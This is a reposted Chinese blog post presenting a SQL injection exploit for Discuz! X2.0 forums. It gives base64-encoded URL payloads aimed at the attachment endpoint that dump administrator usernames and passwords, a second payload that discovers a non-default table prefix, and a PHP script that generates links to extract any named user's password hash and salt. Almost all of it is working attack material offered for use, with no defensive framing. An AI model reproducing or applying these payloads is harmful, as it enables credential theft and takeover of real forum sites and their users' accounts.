（轉）Discuz!X2.0SQL隱碼攻擊漏洞EXP

DZ2.0直接暴管理賬號密碼（預設字首的情況下）

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

rZSAnYWRtaW58eHx5%3D

base64解碼

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

from pre_common_member where  username like ‘admin|x|y

如果不是預設字首

暴字首EXP

/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

 ———————–

再貼個PHP的EXP

<?php

$host=”http://X2.0論壇地址”;

$affuser=”要爆的使用者名稱username”;

echo ‘<a href=”‘;

echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));

echo ‘” target=”_blank”>爆字首</a>’;

echo “</br>”;

echo ‘<a href=”‘;

echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;

echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));

echo ‘” target=”_blank”>爆password,salt</a>’;

?>

本文轉自enables 51CTO部落格，原文連結：http://blog.51cto.com/niuzu/599557，如需轉載請自行聯絡原作者